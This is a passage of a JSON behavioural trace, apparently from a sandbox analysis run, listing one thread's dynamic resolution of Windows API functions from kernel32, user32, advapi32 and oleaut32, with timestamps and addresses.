"FunctionName", "value": "SysReAllocStringLen" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76db3500" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SysAllocStringLen" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daf9e0" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "advapi32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "user32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyboardType" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a0130" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-03-02 21:32:31,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DestroyWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651ee0" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "LoadStringA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76635870" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MessageBoxA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76690950" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CharNextA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634000" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetACP" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880660" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-03-02 21:32:31,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualFree" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f760" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-03-02 21:32:31,451", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-03-02 21:32:31,467", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentThreadId" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e1b0" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-03-02 21:32:31,467", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "InterlockedDecrement" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587eb00" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-03-02 21:32:31,514", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "InterlockedIncrement" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587ea80" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-03-02 21:32:31,514", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualQuery" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f810" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-03-02 21:32:31,514", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WideCharToMultiByte" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e290" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-03-02 21:32:31,514", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MultiByteToWideChar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e220" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-03-02 21:32:31,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "lstrlenA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758806e0" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-03-02 21:32:31,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "lstrcpynA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879300" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-03-02 21:32:31,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "LoadLibraryExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758818c0" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-03-02 21:32:31,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadLocale" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758789d0" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-03-02 21:32:31,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetStartupInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880f20" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-03-02 21:32:31,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-03-02 21:32:31,545", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 54 }, { "timestamp": "2025-03-02 21:32:31,545", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-03-02 21:32:31,545", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetLocaleInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878410" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-03-02 21:32:31,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetLastError" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e2b0" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-03-02 21:32:31,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCommandLineA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882180" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-03-02 21:32:31,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FreeLibrary" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d80" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-03-02 21:32:31,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FindFirstFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883450" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-03-02 21:32:31,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FindClose" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883410" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-03-02 21:32:31,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-03-02 21:32:31,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CompareStringA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877d40" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-03-02 21:32:31,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 64 }, { "timestamp": "2025-03-02 21:32:31,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "UnhandledExceptionFilter" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758972c0" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFilePointer" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837c0" } ], "repeated": 0, "id": 66 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetEndOfFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883780" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "RtlUnwind" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880860" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "RaiseException" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880850" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetStdHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758819a0" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-03-02 21:32:31,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-03-02 21:32:31,639", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileType" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883600" } ], "repeated": 0, "id": 73 }, { "timestamp": "2025-03-02 21:32:31,654", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 74 }, { "timestamp": "2025-03-02 21:32:31,654", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-03-02 21:32:31,654", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 76 }, { "timestamp": "2025-03-02 21:32:31,654", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TlsSetValue" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e250" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-03-02 21:32:31,670", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TlsGetValue" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e1c0" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-03-02 21:32:31,670", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "LocalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880700" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-03-02 21:32:31,670", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "user32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CreateWindowExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638c20" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "WindowFromPoint" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766531d0" } ], "repeated": 0, "id": 83 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "WaitMessage" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766531a0" } ], "repeated": 0, "id": 84 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "UpdateWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76644f50" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "UnregisterClassA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766398e0" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-03-02 21:32:31,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": 